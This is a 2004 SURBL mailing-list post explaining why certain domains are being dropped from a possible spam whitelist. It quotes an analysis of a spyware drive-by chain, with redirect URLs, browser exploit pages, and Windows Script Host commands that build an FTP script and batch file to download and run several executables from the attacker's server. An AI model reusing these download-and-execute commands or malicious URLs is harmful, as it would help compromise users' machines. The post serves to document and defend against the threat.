[SURBL-Discuss] Need help checking FP list from Theo

Jeff Chan jeffc at surbl.org
Tue Sep 7 08:36:28 CEST 2004


My bad, I inadvertently included a message which was about
trojan-like spyware, which is publically avialable at:

  http://seclists.org/lists/bugtraq/2004/May/0153.html

> http://65.17.207.40/framepb_1u.php
>
> which redirects to
> 
> http://si1.default-homepage-network.com/180/180.htm?si-001
> 
> which redirects to
> 
> http://object.passthison.com/vu083003/object.cgi?si1
> 
> which uses the Object Data vulnerability to change your startpage to
> 
> http://default-homepage-network.com/start.cgi?hkcu
> 
> the parameter at the end is either HKCU or HKLM depending on what
> registry branch lead you there. This serves to notify
> default-homepage-network whether your machine has been compromised with
> user or administrator privileges
> 
> start.cgi also opens a few popup windows with advertisements, after
> which it opens the following page=20
> 
> http://default-homepage-network.com/newspynotice.html
> 
> that wants to sell you a cure against spyware which hijacks your start
> page - as theirs just did.
> 
> That page also secretly opens
> 
> http://object.passthison.com/vu083003/newobject1.cgi
> http://69.50.139.61/hp1/hp1.htm
> http://www.achtungachtung.com/0021/index.php
> 
> newobject1.cgi executes the following commands through the Windows
> Script Host object:
> 
> wsh.Run('command /C echo open
> downloads.default-homepage-network.com>o',false,6);
> wsh.Run('command /C echo tmpacct>>o',false,6);
> wsh.Run('command /C echo 12345>>o',false,6);
> wsh.Run('command /C echo bin>>o',false,6);
> wsh.Run('command /C echo get install2.exe>>o',false,6);
> wsh.Run('command /C echo get infamous_downloader.exe>>o',false,6);
> wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6);
> wsh.Run('command /C echo get CS4P028.exe>>o',false,6);
> wsh.Run('command /C echo bye>>o',false,6);
> wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o
>>o.bat',false,6);
> wsh.Run('command /C echo if exist install2.exe install2.exe
>>>o.bat',false,6);
> wsh.Run('command /C echo if exist infamous_downloader.exe
> infamous_downloader.exe >>o.bat',false,6);
> wsh.Run('command /C echo if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
>>>o.bat',false,6);
> wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe
>>>o.bat',false,6);
> wsh.Run('command /C o.bat',false,6);
> 
> Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch
> http://69.50.139.61/hp1/HP1.chm::/hp1.htm
> 
> framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which
> uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm
> 
> Other files that are attempted to be delivered are
> 
> http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab
> http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe
> http://validation-required.info/
> http://www.popmoney.net/ip/index.php
> http://www.portalone.hostance.com.com/italia.exe

Therefore I am taking all those domais out of the possible
whitelist.

Jeff C.



More information about the Discuss mailing list